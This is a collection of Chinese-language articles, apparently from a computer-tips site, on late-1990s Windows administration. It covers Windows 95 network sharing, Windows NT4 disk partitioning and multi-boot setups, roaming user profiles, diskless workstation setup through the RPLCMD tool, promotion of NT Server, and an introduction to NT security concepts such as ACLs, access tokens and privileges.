    启动Windows 95机器，在“输入网络口令”对话框输入网络用户名称及口令，进入Windows 95系统，此时桌面上应出现“网上邻居”图标。双击该图标后选择“整个网络”，即可看到网上的计算机、文件夹、打印机等。利用“Windows资源管理器|工具”中的“映射网络驱动器”，就能够像使用本地资源一样方便地访问网上的共享资源。本地的资源也可以通过其属性菜单将其设置成“共享”，供网上其他用户使用。

返回


Windows NT4 磁盘分区对策

《一键清理系统垃圾》

Windows NT4 磁盘分区对策

    现在，做图形图像的朋友逐渐多了起来。许多人都使用Windows NT4作为操作平台。的确，Windows NT具有诸多的优异性能，是组建个人图形工作站的首选操作系统。在这里，我就不再描述NT的优点了。

    但是，许多刚开始接触NT的朋友经常问：为什么安装Win 98以后就不能安装NT了？NT到底能不能够和DOS、Win 95、Win 98实现多重启动？这些问题比较麻烦，因为它涉及到Windows NT4的特殊磁盘分区格式问题。这里，我就结合我的经验，向朋友们提供一些Windows NT4的磁盘分区对策。

    分区对策

    1．Windows NT4支持什么样的分区

    简单地讲，在一块硬盘上，Windows NT4只能被安装在FAT16或者NTFS格式的磁盘分区上，并且硬盘的启动分区必须是FAT16或者NTFS格式。

    对于FAT16格式，想必大家早有了解，在此就不必赘述了。NTFS磁盘格式是微软专门为Windows NT4设计的高级文件系统，它支持数百兆的大型文件，可以对每一个文件夹设置不同用户的不同权限，限制某些用户的访问。并且，这种文件系统永远不会产生文件碎片。

    2．Windows NT4可以访问什么样的分区

    Windows NT4可以访问FAT16和NTFS格式的分区，不能访问FAT32分区。但是，现在一些共享软件提供了用NT4访问FAT32分区的方法，其功能有限。

    3．Windows NT4可以和哪些操作系统实现多重启动

    Windows NT4可以和MS－DOS、Win 95、Win 95－OSR2、Win 98实现多重启动。但条件是：启动分区必须是FAT16格式。

    许多朋友用Win 98启动盘启动机器并且进行分区，此时文件系统是FAT32，当然不能安装Windows NT4。如果希望把机器做成双启动，应该用MS－DOS启动盘引导机器。

    4．如何实现Windows NT4和其他操作系统的多重启动

    用户可以先安装MS－DOS、Win 95、Win 95－OSR2或Win 98中的一个，再安装Windows NT4。以先安装MS－DOS为例，安装完毕NT4后，NT4的启动文件将接管机器的启动过程，并显示启动菜单如下：

    “Windows NT Workstation Version 4.00

     Windows NT Workstation Version 4.00[VGA mode]

     MS－DOS”

    当用户安装Win 95、Win 95－OSR2或Win 98时，第三项就变成相应的选项。Windows NT提供用户30秒的选择时间，选择使用什么系统引导。在这个选单里，第二项的作用相当于Win 95的“安全模式”，专门用于解决显示卡设置的问题。

    用户也可以先安装Windows NT，再安装MS－DOS、Win 95、Win 95－OSR2或Win 98中的一个，效果完全相同。

    5．Windows NT4支持多大的分区

    当使用FAT16格式时，该格式仅支持2G的分区。当使用NTFS格式时，用于引导的NTFS分区最大支持硬盘上1024个柱面，其余分区不限大小。

    6．Windows NT4和Linux共存

    许多朋友都想装上Linux试一试。由于不同版本的Linux要求不尽相同，所以Windows NT4和Linux的共存比较复杂。但是简单地说，Linux的分区和Windows NT4所使用的分区互不相认。这一点请朋友们注意。

    好了，了解了这些常识，我们就可以为自己的“酷机”制定分区方案了。

    分区方案

    方案1：我既想玩游戏，又想玩NT

    NT不支持绝大多数游戏，这是非常遗憾的。如果哪位朋友想在学用NT之余玩游戏，不妨采用NT和Win 98双启动方案。当您的Win 98不是很大时，可以这么办：
硬盘 分区格式 容量 作用
c盘 fat16分区 2g 安装win 98
d盘 ntfs分区 不限 安装nt4

    如果您的Win 98下安装了大量软件，也可以这样作：

硬盘 分区格式 容量 作　用
c盘 fat16分区 小于2g 存放共享数据
d盘 ntfs分区 不限 安装nt4
c盘 fat32分区 不限 安装win 98

    这个方案应该注意：最好将Win 98和NT分别装在FAT32和NTFS上，让它们的系统文件互相之间不会发生干扰和混乱。同时，如果硬盘足够大，再设立一个FAT16分区专门存放两个系统之间的共享数据。

    方案2：我需要NT，但难以割舍DOS

    我有一个朋友，只会用3D Studio 4，因此每次作三维动画都得跑到DOS下面。确实，有的时候DOS是难以割舍的。不过NT4可不支持什么“DOS模式”。如果还想用DOS，就得这样分区：

硬盘 分区格式 容量 作 用
c盘 fat16分区 小于2g 安装dos
d盘 ntfs分区 不限 安装nt4

    方案3：我完全依赖NT

    安全依赖NT4，分区也最方便：

硬盘 分区格式 容量 作 用
c盘 ntfs分区 1024个柱面 安装nt4
d盘 ntfs分区 不限

    注意：最好将NT4装在C盘。若非要装在D盘，当您外接另一块硬盘时，这块外接硬盘就会顶替原来D盘的位置，NT4就启动不了了。

    方案4：用NT对付特大硬盘

    NT4是1996年开发成功的，那时1G的硬盘都是稀罕东西。现在，市场上流行的硬盘眼见就要超过100G，NT4也感到不太得力了。一般常见的问题是在安装时，不能全部识别出硬盘的所有空间。

    遇到这种问题，不必管它，先把第一个分区做出来，装好NT4，一切都弄好NT4启动之后，使用“开始→程序→管理工具（公用）→磁盘管理器”，可以看到未分区磁盘空间的真实大小。使用“磁盘分区/创建扩展分区”命令，可以将其余磁盘进行分区，然后再格式化。

返回


Windows NT4.0网络中漫游用户配置文件的建立

《一键清理系统垃圾》

Windows NT4.0网络中漫游用户配置文件的建立

    目前，关于如何在NT中建立漫游用户配置文件的书籍不少，但大多理论多、实例少，即使有几个例子，也不连贯。针对这种情况，笔者通过一个具体的实例来阐述建立漫游用户配置文件的详细过程。本例的网络为NT网络，网络中只有一个域，主域控制器的计算机名为“HP”，操作系统为Windows NT Server 4.0；域中有一台工作站名为“LX”，操作系统为Windows NT Workstation 4.0，现在想为“LX”的使用者Gwy创建一漫游用户配置文件，须经下列步骤：
    步骤一：在HP上的任意位置创建一子目录User，再在User中创建另一子目录Gwy(当然也可与HP上的本地用户配置文件放在一起如：\\HP\Winnt\Pros\Gwy)，并将User设为共享。
    步骤二：在域用户管理器上创建一个账号“Gwy”，再在其配置文件对话框的配置文件路径中填入路径：“\\HP\User\Gwy”。在登录脚本名中填入登录脚本名，如果登录后无特殊要求的话，此项可以不填。为实验其效果，本例中采用了一个自编的D.BAT文件，用于列出宿主目录中的文件。在登录脚本名中填入：“D.BAT”，并将其放入“\HP\Winnt\System32\Repl\Import\Scripts”中。在宿主目录中填入：连接“X”到“\\HP\Winnt”。其中“X”是为宿主目录所起的名字，“X”实质上就是映射的网络驱动器名，每次登录时自动连接，但要注意不要与“LX”上的任意驱动器重名，否则无效。至于“\\HP\Winnt”中的“Winnt”项可任选为其他的任意需要共享的目录，但要注意共享名的正确性。本例中如果“Winnt”是由安装时系统创建的，那么它很有可能使用的是默认隐藏的共享名“Admin＄”，这时候如果再使用“Winnt”作为共享名就会得到错误提示，或最近达不到连接的效果。
    步骤三：为“Gwy”创建配置文件，可采用两种方法：
    方法一：在“\\HP\User\Gwy”中手工创建，将自己认为与“Gwy”配置文件要达到的目标相近的用户配置文件从“\\HP\Winnt\Pros\％Username％”中拷到“\\HP\User\Gwy”中，再根据自己的需要做适当修改。
    方法二：在“LX”上以“Gwy”账号登录，这样系统就会为“Gwy”创建一套默认用户配置文件，经过适当的修改，如墙纸颜色、启动菜单、桌面设置、快捷方式等等。达到自己的要求后打开“控制面板”，打开“系统图标”，切换到“用户配置文件”标签，选中“Gwy”，单击“复制到”按钮，在弹出的对话框中选中“HP”上的“Gwy”文件夹，单击确定，则“\\LX\Winnt\Pros\Gwy”就被复制到“\\HP\User\Gwy”中了。
    至此，漫游用户的配置文件的建立就大功告成了，下面让我们简单试一下它的效果如何。首先在“LX”上注销登录，然后在“\\HP\User\Gwy\桌面”中添加一个位图图像。然后在“LX”上重新登录，登录后你会发现屏幕上突然多了一个DOS运行窗口，有一行行的目录在向上滚动。不要奇怪，那是我们的一个实验小登录脚本“D.BAT”在列出它的宿主目录“X”(即\\HP\Winnt)中的子目录呢!登录脚本执行完后，你会发现屏幕上出现了一个新建位图图像，这就是在“HP”上的配置文件中刚刚加上去的位图图像，如果想把配置文件定为强制型的，只需将“HP”中“Gwy”文件夹中的“NTUser.dat”改名为“NTUser.man”即可。

返回


Windows NT4.0下建立PWin95无盘工作站的注意事项

《一键清理系统垃圾》

Windows NT4.0下建立PWin95无盘工作站的注意事项

     一、对于NE2000的兼容网卡，可直接使用Windows NT4.0提供的各项驱动程序及设置。因为相关的文件都可在相应的NE2000子目录中找到，如：DOSBB.CNF和W95BB.CNF文件可在\winnt\bblock\NetBEUI\NE2000目录下找到。所以在建立适配器引导配置文件时，把“Bbc=”项中的“bblock\NetBEUI\adaper\”换为“bblock\NetBEUI\NE2000\”即可。
    二、建立DOS6.22无盘工作站的启动配置时，应注意两点：
    1.安装DOS无盘工作站时一定要把IO.SYS和MSDOS.SYS文件的系统、隐藏的属性清除掉，否则工作站启动登录时，可能会出现：
    Non－system disk or disk error
    Replace and press any key when ready
    信息，因而无法启动无盘工作站。
    2.拷贝到\winnt\rpl\rpls\bins\DOS6.22下的IO.SYS和MSDOS.SYS必须是英文版DOS6.22的系统文件，否则安装PWin95不正常。
    三、安装完PWin95的共享文件后注意正确执行相应的批处理文件。
    1.如果是对远程启动服务升级，请先启动远程启动服务器的远程启动服务，然后执行Rbootsrv.bat批处理文件，让它具有PWin95远程启动的功能。该文件存放在\winnt\rpl\bin目录，命令格式为：
    Rbootsrv <服务器中保存PWin95的路径><远程启动目录的路径> [远程启动服务器的计算机名称]
    2.执行WIN95SRV.BAT批处理文件时，应注意目录路径格式的书写，例如：
    正确格式：Win95srv \ntsrv\PWin95
    错误格式：Win95srv D:\PWin95
    若采用错误的格式，将会导致无盘启动PWin95时读硬盘，而无法实现真正的无盘启动。
    四、不需要设置服务器和工作站时间同步。
    很多杂志介绍必须要求服务器与工作站时间同步，其实经过验证，无需此步骤照样能正常安装和启动PWin95。
    五、在DOS无盘工作站上安装PWin95时，要注意安装选项使用“CUSTOM”方式，不要选用“TYPICAL”方式，否则，安装过程会死机，而且下次再安装PWin95时不正常。
    六、修改MACHINES.INI文件时，注意书写磁盘代号，不要加上冒号，例如：
    正确格式：G=\NTSR\RPL95
    不正确的格式：G:=\NTSR\RPL95
    若使用不正确的格式，则不能正常启动PWin95。
    七、应从“真正”的无盘工作站上安装PWin95到工作站用户目录下。
    注意：若只卸掉硬盘，而软驱未禁止掉，则从无盘工作站把PWin95安装到RPL95目录下的CLIENT1目录后，发现缺少两个文件CONFIG.SYS和AUTOEXEC.BAT。所以从无盘工作站启动PWin95时无法建立虚拟盘，导致出现“SCREATION ERROR”的错误提示。只有把软驱禁止掉后，重新安装PWin95到CLIENT1目录即会正常。

返回


Windows NT 4.0下无盘工作站的建立

《一键清理系统垃圾》

Windows NT 4.0下无盘工作站的建立

★Windows NT界面友好，好学易用，是当今网络操作系统一杰；无盘工作站投资少，安全性高，是网络用户特别喜欢的一种形式。两者结合，省钱又省心，何乐而不为呢?嘿!这儿就有一位知乐而为者，让我们瞧瞧他是怎么做的吧。

    安装Windows NT无盘工作站必须选用支持NT远程启动的网卡。在众多的网卡中，卡号前六位数字为0020AF和00608C的网卡直接支持NT的远程启动，如果你选用的网卡是这两种，那么你就可以忽略本文中添加网卡部分的内容。
    一、准备工作
    设NT安装在D:\WINNT目录下,工作站网卡I/O=300,IRQ=3,BOOTADRESS=C800(尽量用此设置),其卡号前六位为0000E8（通过网卡的附带程序测得）。
    1.通过“控制面板网络添加协议”添加DLC通讯协议。
    2.通过“控制面板网络添加服务”添加“远程启动服务”。
    3.通过“控制面板服务”激活“服务”对话框,在“启动类型”选项中选中“自动”,再单击“确定”即可。
    二、在DOS6.22下添加网卡
    1.将网卡的MS－DOS驱动程序复制到D:\WINNT\RPL\BBLOCK\NDIS目录下,一般其扩展名为.DOS。
    2.新建一个D:\WINNT\RPL\BBLOCK\NETBEUI\adapter目录(其中adapter为变量，代表网卡名)。将网卡驱动盘上的PROTOCOL.INI和DOSBB.CNF复制到此目录下。
    3.编辑DOSBB.CNF,确保刚才复制的＊.DOS和PROTOCOL.INI工作路径的正确性。重新编辑DOSBB.CNF,将“EXE BBLOCK\I13.COM ～～～”一行改为“EXE BBLOCK\W95I13.COM ～～～”,并另存为W95BB.CNF。
    4.在MS－DOS方式下执行RPLCMD
    D:\WINNT\RPLCMD
    适配器　引导Config配置文件　服务代理商WKSTA　[退出]:V(Vender)
    (Adapter Boot Config　Profile Vender　[Quit])
    Add Del Enum:A(Add)
    VenderName=0000e8(输入卡号前六位)
    all other parameters are optional
    VenderComment=
    适配器　引导Config配置文件　服务代理商WKSTA　[退出]:B(Boot Block)
    Add Del Enum:A
    BootName=boot1
    VenderName=0000e8(对应VenderName)
    BbcFile=BBLOCK\NETBEUI\adaper\DOSBB.CNF(注意修改adapter)
    all other parameters are optional
    BootComment=
    WindowSize=
    适配器　引导Config配置文件　服务代理商WKSTA　[退出]:C(Config)
    Add Del Enum:A
    ConfigName=config1
    BootName=boot1(对应BootName)
    DirName=dos
    DirName2=dos622
    FitShared=fits\dos622.fit
    FitPersonal=fits\dos622p.fit
    all other parameters are optional
    ConfigComment=My Config for Dos6.22(新配置)
    DirName3=
    DirName4=
    适配器　引导Config配置文件　服务代理商WKSTA　[退出]:Q
    三、建立DOS6.22的无盘工作站
    1.将DOS6.22的文件复制到D:\WINNT\RPL\RPLFILES\BINFILES\DOS622下,并解除MSDOS.SYS和IO.SYS的S和H的属性。
    2.启动“远程启动管理器”,执行“配置检查配置”并选择“是”;执行“配置修复安全性”,选择“是”。
    3.建立启动配置文件(profile),注意选择建立的新配置：My Config for Dos6.22。
    4.用建好的配置文件建立新的工作站,在“WKSTA”处输入工作站名,如:WS1;在“适配器　ID”处输入卡号，例如:0000E8401BD1。
    5.启动远程工作站。
    四、给无盘工作站安装Windows 3.2
    1.启动远程工作站,当出现“Type Remoteboot username,or press enter if it is WS1:”的信息时,输入“ADMINISTRATOR”,然后输入相应密码登录。
    2.通过修改工作站上的config.sys和autoexec.bat加载光驱。重新启动计算机,再次以ADMINISTRATOR登录。
    3.将Windows 3.2的安装盘放入光驱,执行SETUP/A将Windows 3.2安装到C:\WIN目录下,实际是安装到了服务器的D:\WINNT\RPL\RPLFILES\BINRILES\WIN目录下。
    4.进入C:\WIN,执行SETUP/N,将Windows 3.2安装到C:\Windows目录下，勿作改动。工作站专用的Windows 3.2已安装完毕。
    5.回到根目录,执行XCOPY /E C\Windows C\WKSTA.PRO\WIN以后，所有以此profile登录的工作站都可以共享Windows 3.2了。
    在Windows 3.2的安装过程中，最容易因内存不足而导致安装失败，注意通过调整config.sys和autoexec.bat加以解决。
    五、安装Windows 95的共享文件
    1.在NT服务器上建一共享目录(如PWIN95S)用于保存公共文件，并建另一共享目录(如:RPL95)用于保存每台工作站的私有文件。
    2.登录一台普通的Windows 95工作站,将Windows 95安装光盘放入CD－ROM中，执行ADMIN\NETTOOLS\NETSETUP\NETSETUP.EXE,将Windows 95的文件安装到\\NTS4\PWIN95S中(其中NTS4为服务器名)。按缺省值完成安装即可。
    3.在服务器上放入Windows NT光盘，执行CLIENTS\RPL\UPDATE\WIN95下的WIN95SRV.BAT文件。此步骤使PWIN95S中的文件具有网络安装功能。
    六、在Windows 95下添加网卡
    在服务器的MS－DOS方式下执行RPLCMD
    D:\WINNT\RPLCMD
    适配器　引导Config配置文件　服务代理商WKSTA　[退出]:B
    Add Del Enum:A
    BootName=boot2
    VenderName=0000e8
    BbcFile=BBLOCK\NETBEUI\adaper\W95BB.CNF
    all other parameters are optional
    BootComment=
    WindowSize=
    适配器　引导Config配置文件　服务代理商WKSTA　[退出]:C
    Add Del Enum:A
    ConfigName=config2
    BootName=boot2
    DirName=dos
    DirName2=win95
    FitShared=fits\win95.fit
    FitPersonal=fits\win95p.fit
    all other parameters are optional
    ConfigComment=My Config for Pwin95
    DirName3=
    DirName4=
    七、安装第一台Windows 95无盘工作站
    1.登录MS－DOS无盘工作站,映射网络驱动器。(因为Windows 95远程启动时首先映射C盘,所以工作站本地硬盘和光盘盘符从D开始,另外由于Windows 95还需要一个虚拟盘(RAMDRIVE),所以需要保留一个盘符给RAMDRIVE。为方便起见，我们事先拔掉硬盘但保留光盘进行安装)
    NET USE F:\\NTS4\PWIN95S
    NET USE G:\\NTS4\RPL95
    2.在F盘上执行SETUP,将Windows 95安装到G:\CLIENT1目录下。安装出现“Setup Options”选择“Custom”;出现“Analyzing Your Computer”对话框时选择“No I want to modify the hardware list”，并删除所有硬件;出现“Network Configuration”对话框时,请利用“选择网卡PropertiesResources”设置网卡的IRQ和I/O地址;其余选择Windows 95的缺省值。
    3.运行“远程启动管理器”,执行“检查配置”和“修复安全性”，建立一个使用“My Config for Pwin95”配置的profile,例如:PROFILE95。
    4.执行服务器上的D:\WINNT\RPL\BIN\WIN95CLT.BAT建立配置文件与工作目录及服务器的对应关系,例如:Win95clt d:\95rpl\client1 \\NTS4 PROFILE95。
    5.修改D:\PWIN95S目录下的MACHINES.INI文件。加入工作站的启动信息,例如:
    [0000E84018C6]
    SYSDATPATH=G:\CLIENT1
    G=\\NTS4\RPL95(注意这两行的对应关系)
    6.更换工作站的profile为PROFILE95，重新启动工作站，当出现“Type the username,or press enter if it is 0000e84018c6:”时,注意输入用户名,例如:WS1即可完成以后的安装。
    八、安装其他Windows 95无盘工作站
    1.启动一台MS－DOS的无盘工作站。
    2.在一台普通的Windows 95工作站上执行Windows 95光盘上的NETSETUP.EXE程序。出现“服务器安装“对话框时,单击“设置路径”。
    3.出现“服务器路径”对话框时,输入:\\NTS4\PWIN95S,单击“确定”。
    4.单击“机器安装目录”中的“添加”按钮,分别输入计算机名，本机工作目录和第一台无盘工作站的工作目录。例如:WS2;\\NTSR\RPL95\CLIENT2;\\NTS4\RPL95\CLIENT1。继续完成以后安装。
    5.在服务器上修改工作站的启动记录,让它使用第一台工作站的profile,修改MACHINES.INI,加入该工作站的信息(方法同上)。
    6.重新启动工作站，完成安装。
    (注意：工作站网卡设置要与第一台工作站网卡设置相同。)

返回


Windows NT Server——支持Windows 95的最佳网络平台

《一键清理系统垃圾》

Windows NT Server——支持Windows 95的最佳网络平台

    随着Windows 95的推出,许多企业开始考虑用Windows 95的新功能来增强他们前台桌面机的能力:如多任务,Internet连接,集成的FAX服务与电子邮件服务。当你在考虑Windows 95带来的新机会时,实际上也是一个理想的时机来考虑利用Windows NT Server来增强你现有的网络系统或者是建立一个新的网络。
    Windows NT Server既是一个出色的文件与打印服务器,同时也是出色的应用服务器。它也被相当广泛地选为Internet的平台(作为Internet Server),使Windows 95的客户机可以方便地访问Internet,并且Windows NT Server还可以作为强大的通讯服务器,出色地发挥Windows95内置的远程通讯功能。
    作为Windows家族的成员之一,Windows NT Server被设计成可以最好地发挥Windows 95 优势的网络操作系统。Windows NT Server是一个健壮的(robust)多用途的网络操作系统,它不仅提供了高性能的文件与打印服务功能,还提供了支持Client/Server应用的强大的基础结构。
    MICROSOFT是唯一可以提供一整套被设计与调整成专门支持WINDOWS网络方案的客户端软件与服务器软件的一家公司。Windows网络方案的主干是Windows NT Server,它是Windows 95客户机的最佳服务器。
    ·Windows NT Server与Windows 95被设计成一起协同工作。
    Windows NT Server与Windows 95的结合,意味着简便的安装、配置与操作,也意味着从最终用户到网络管理员的全面一致的集成。
    ·一个服务器满足你全部的网络需要,并提供资源与工具来帮你支持与维护网络。
    Windows NT Server RAS给MS－DOS客户、Windows客户和任何PPP客户提供远程访问服务。它还支持基于TCP/IP、IPX/SPX和NetBEUI LAN等局域网的互操作性。
    ·Windows NT Server是一个可靠性很高的操作系统。
    Windows NT Server是一个稳定的具有高可靠性的操作系统。它具有微内核体系和软件模块，彼此通过安全接口连接。Windows NT Server的错误条件由结构化例外处理来捕获，它是一种操作系统或处理器处理例外的方法，不寻常事件由例外处理代码进行处理。通过结构化的例外处理，表现失常的应用程序不会影响系统发挥功能。PC机所必需的硬盘引入了一种在别的网际设备中从未有过的构成因素。文件系统(NTFS)可以从各种类型磁盘错误(包括使磁盘严重受损的错误)中恢复过来。NTFS使用冗余存储和基于传递的机制存储数据，在鲜见的系统崩溃时确保数据可以恢复。
    ·Windows NT Server提供安全的远程访问服务和路由。
    Windows NT Server RAS支持基于域的安全，与登录进Windows NT Server系统分离的远程访问验证，密码加密和验证过程加密，回呼安全性，支持中介安全宿主机，审计，受限网络访问和数据加密。
    Eicon用于Windows NT Server的广域网服务包括先进的IP过滤，由管理员决定哪些包可以在广域网上传输。管理员可以严格配置过滤器，截下或传送与过滤条件相匹配的包。
    ·MICROSOFT提供一组被设计与优化成协同工作的集成的应用（OFFICE),Windows NT Server实际上可以增强OFFICE 95的能力与功能。
    总之,Windows NT Server 与Windows 95的结合,将为你节省用于业务与网络管理的时间与金钱。

返回


Windows NT安全性理论与实践

《一键清理系统垃圾》

Windows NT安全性理论与实践

    本文是是一系列技术论文的第一篇，描述封装Windows NT安全性应用程序接口的C++类层次的实现和编程。这一系列论文包括：

    "Windows NT Security in Theory and Practice" (介绍)"The Guts of Security" (安全性类层次的实现)"Security Bits and Pieces" (样板程序的结构)"A Homegrown RPC Mechanism" (描述样板程序使用的远程通信)在本文中，将会在相当高的水平上对安全加密进行探讨。

    介绍安全性在操作系统中应该是相当容易实现的，对吗？就是说，为任意对象指定某个安全级别所需要做的所有工作只是一个简单的函数调用，例如GrantAccessTo或者DenyAccessTo，对吗？

    不幸的是，Windows NT安全性应用程序接口(API)看起来并不是那么简单。它包含了过多的与安全性有关的函数，并且仅仅为一个用户打开一个对象的工作就已经非常复杂了。

    要正确使用安全性API，需要按照下面几个层次去理解：

    第一个层次是理解数据结构：访问控制表(ACLs)，访问控制元素(ACEs)，安全性描述符(SDs)和安全性IDs (SIDs)。

    第二个层次是理解ACLs的语义（虽然不需要理解它们是如何工作的）。根据ACLs建立顺序的不同，对同一个用户的访问可能允许，也可能不允许。

    第三个层次是理解操作系统本身如何使用安全性。可以将安全性API理解成为服务器应用程序提供用来保护对象不被未授权的用户访问的服务集合，同事务日志帮助设备驱动程序和应用程序记录错误以及确认事件提供服务的方法相同。

    在这些服务只被第三方应用程序使用时，相当容易理解安全性是如何工作的。然而，Windows NT是一个安全的操作系统，此外，基于Windows NT的网络也非常依赖于安全性。因此，安全性结合到系统的方法就显得很模糊。

    谁需要安全？

    在进入任何细节之前，先要明确为什么会需要安全性。如果不是处于下面的情况，就根本不必为安全性担心：

    正在写一个服务器应用程序，即几个用户都可以访问的一个应用程序，而且此服务器应用程序只限于为这些用户的一个子集提供数据结构。

    注意这是一个相当广泛的定义。下面是满足条件的几个例子程序。

    对于单机（没有连网的计算机），编写一个服务，Windows NT启动以后一直运行，并且有多个用户在此计算机上登录及退出。该服务提供的信息只对少数用户可见。例如，想收集使用模式或者登录数据，就可能只限于管理员访问该数据。

    许多特权限制在系统级。例如，系统注册表受保护，使得只有具有特殊特权的用户能够向系统中添加设备驱动程序。这是由于安全性的原因。例如，一个恶意的用户能够利用设备驱动程序监控用户输入的能力窃取其它用户的工作。安全性也有助于系统的稳定。设想一个未经授权的用户安装了一个粗制滥造的设备驱动程序。当其它用户工作时，这样的驱动程序会造成系统崩溃。通过将注册新设备驱动程序的权利限制给可信赖的用户，能够防止Windows NT的计算机上出现这种情况。

    许多在网络上工作得与单机上同样好的服务器程序得益于与安全性系统的某种挂钩。例如，一个数据库服务器可能同时为几个用户服务，某些用户不允许查看给定数据库中的某些数据。假设公司内的每个人都能够查询员工数据库。管理人员需要访问员工的全部信息，而其他人则应该只能看到工作头衔和办公室编号。如果将包含工资和奖金信息的字段限制于管理人员访问，就可以允许公司内所有的人使用同一个数据库，而不会危及安全性和机密。

    安全性的微观视图

    安全性的一个问题是使用安全性API毫无新奇刺激可言。其他人编写的代码可以旋转茶壶、在窗口中显示动画、弹出很酷的Windows 95控件、通过MAPI来回发送数据等等，而安全性编程却总是令人厌烦的事情。

    Windows NT安全性表现的非常复杂，相比之下，从微观水平上看则比较简单。每个Windows NT域（或域组）保存有一个该域所知道的用户的数据库。用户想要在Windows NT的域中工作，必须先使用一个用户名和口令证明自己。一旦安全性系统证明了口令，用户就会被关联到一个访问令牌，识别用户的内部数据结构。

    关于Windows NT下安全性必须知道的首要事情是它是以用户为中心的；也就是说，试图访问受保护对象的每一行代码都必须与一个特殊用户关联，该用户必须用口令向客户机证明自己的身份。每次安全性检查都要依靠用户鉴别。例如，编写代码阻止Microsoft Excel访问一个对象是不可能的。可以保护一个对象防止Joe Blow运行Microsoft Excel访问，但是如果允许Carla Vip访问该对象，她可以使用Microsoft Excel或者其它喜欢的程序访问，只要Carla使用只有自己知道的口令向客户机证明自己的身份就行。

    安全性API虽然看起来很复杂，但是却只完成两件事：

    审核：每次对特定的对象试图有特定的操作时生成一个日志条目。

    限制对象访问：客户程序调用的函数，可能会成功，失败返回错误代码5（访问被拒绝），或者因其它原因失败，取决于服务器如何指定特权。

    用户可能不是直接看到错误信息，而是一个对话框，上面写着：“你没有特权将鸡蛋从纸盒中拿走。”弹出此对话框的程序内部可能包含下面的代码行：

    if (!RemoveEggsFromCarton() && GetLastError() == ACCESS_DENIED)

    AfxMessageBox("You do not have the privilege to remove the eggs from the carton");

    安全性机制

    Windows NT使用两种导致访问尝试失败返回错误5的机制：确认权限和确认特权。权限属于对象上的行为，比如挂起线程权限或读文件权限。权限总是与特定对象和已知用户相关联。例如，读文件权限必须与文件（权限应用在此文件上）和有或没有权限的用户相关联。同样，挂起线程权限除非与特定的线程和用户关联否则没有用。

    特权是预先定义好的属于系统上操作的权限。例如，特权有调试程序、备份和恢复存储设备以及装入驱动程序。特权以用户为中心，而不是对象。

    为了使两者之间区分得更清楚，可以看一下实现权限和特权的数据结构：权限在叫作访问控制表（ACL）的数据结构中指定。ACL通常与对象相关。用户用访问令牌表示。当用户试图访问受保护的对象时，其访问令牌与对象的ACL检查。访问令牌包含代表用户的唯一标识符（安全性ID，或SID）。ACL中的每个权限与一个SID相关；这样，安全性子系统就知道了与每个用户相关的权限。

    另一方面，特权在访问令牌中编码，所以没有相关联的对象。要确定用户是否允许做某个与特权有关的操作，安全性子系统检查访问令牌。

    此外，权限需要行为的说明（干什么的权限？例如，读文件或者挂起线程），而特权不需要（用户或者有特权，或者没有）。与特权相随的操作隐含在特权本身中。

    特权在访问令牌中编码的原因是大多数特权不考虑安全性需求。例如，允许备份存储设备的用户必须能够绕过文件安全性。为了允许用户访问而给硬盘上每个单独的文件都加入一个新的ACE是不可行的。这样，备份存储设备的代码首先检查试图备份的用户是否拥有备份特权；如果有，单个文件的安全性就被忽略。

    能够与访问令牌相关的特权集被牢固加密，不能被应用程序展开。服务器程序能够使用特殊的权限和普通的映射实现自定的安全性规则。

    有两种类型的ACL：自由决定的(DACL)和系统的(SACL)。DACL管制对象访问，SACL管制审核。

    控制访问

    在大多数情况下，错误5是由Windows NT特有的叫作AccessCheck的Win32函数内部产生的。此函数的输入有用户的访问令牌、需要的特权和ACL。ACL主要是小数据结构（叫作访问控制元素，或ACE）的列表，每个数据结构定义一个用户或一组用户、一个权限集合以及允许或拒绝的信息。例如，ACL中可能有一个ACE写着“从纸盒中拿走鸡蛋的权限明确地拒绝给与用户Elephant和Bozo”，后面一个ACE写着“从纸盒中拿走鸡蛋的权限明确地准予给与用户Betty Crocker以及CHEFS组中所有用户”。

    ACL与对象相关，可以在服务器程序中动态创建。例如，如果一个文件对象与一个ACL相关，不管何时有应用程序试图打开该文件对象，ACL就会被查询以决定是否允许运行应用程序的用户打开文件。

    AccessCheck函数被许多系统函数内部调用，例如，CreateFile（用户试图在NTFS分区或命名管道上打开文件时）和OpenFileMapping。然而，Win32服务器程序能够直接调用AccessCheck，保护想保护的任何对象。

    注意安全性API函数只被服务器程序调用；客户不需要或直接使用安全性。客户曾经看到的Windows NT安全性就是错误5。这使得Windows NT安全性可以不必考虑客户运行的软件。需要的是服务器在域的安全性数据库中确认客户以及将从客户收到的请求翻译成服务器端函数调用的能力。此函数或者隐含调用AccessCheck，或者根据服务器端AccessCheck的输出发送或不发送其结果。

    Windows NT security中容易混淆的部分是对AccessCheck的调用可能是非常模糊的。例如，Windows NT监控设备驱动程序安装的功能是一个非常模糊的概念。当试图添加设备驱动程序时用户要访问哪个“对象”？系统在哪里调用AccessCheck以及必要时在哪里将错误信息显示给用户？

    在设备驱动程序的例子中，答案还不是太困难：因为设备驱动程序和系统通过注册表（Windows NT通过浏览注册表子树，解释每个条目，尝试执行在单独注册表项中指定的驱动程序二进制文件而装入设备驱动程序）交互，Windows NT保护的对象是注册表项，它在Windows NT中是可以得到的对象。在Win32 API层，任何操作注册表的尝试将会翻译成注册表工作的函数，例如RegOpenKey内部调用AccessCheck。

    除了注册表保护外，驱动程序二进制文件也有安全性问题。一个因访问注册表被拒绝而落空的黑客仍然能够用添加了额外功能的驱动程序副本取代原有的驱动程序执行文件。这一过程不需要访问注册表，所以Windows NT如何防止这类问题呢？相当简单，通过要求驱动程序二进制文件存放在NTFS分区并限制对其访问。这样，取代驱动程序二进制文件的企图（在Win32 API层上调用DeleteFile或CreateFile时不可避免地被终止）会被AccessCheck抓住，恶意的黑客就不走运了。

    系统提供的其它安全性对象可能难于说明。例如，怎样阻止用户访问被保护的网络共享？怎样阻止打开远程计算机上的服务控制管理器？系统层如何使Windows NT无懈可击？如何使一些安全性函数自己失败返回错误5，访问被拒绝？设想如果应用程序能够自由操作自己的访问令牌或调用安全性函数改变对象的特权将会出现什么情况？这种情况下，仅仅修改ACL和令牌中的项目就能够简单的绕过安全性。。这样，必须有某种“元安全性”，一种保护安全特性自己不被错误利用的机制。如何实现？

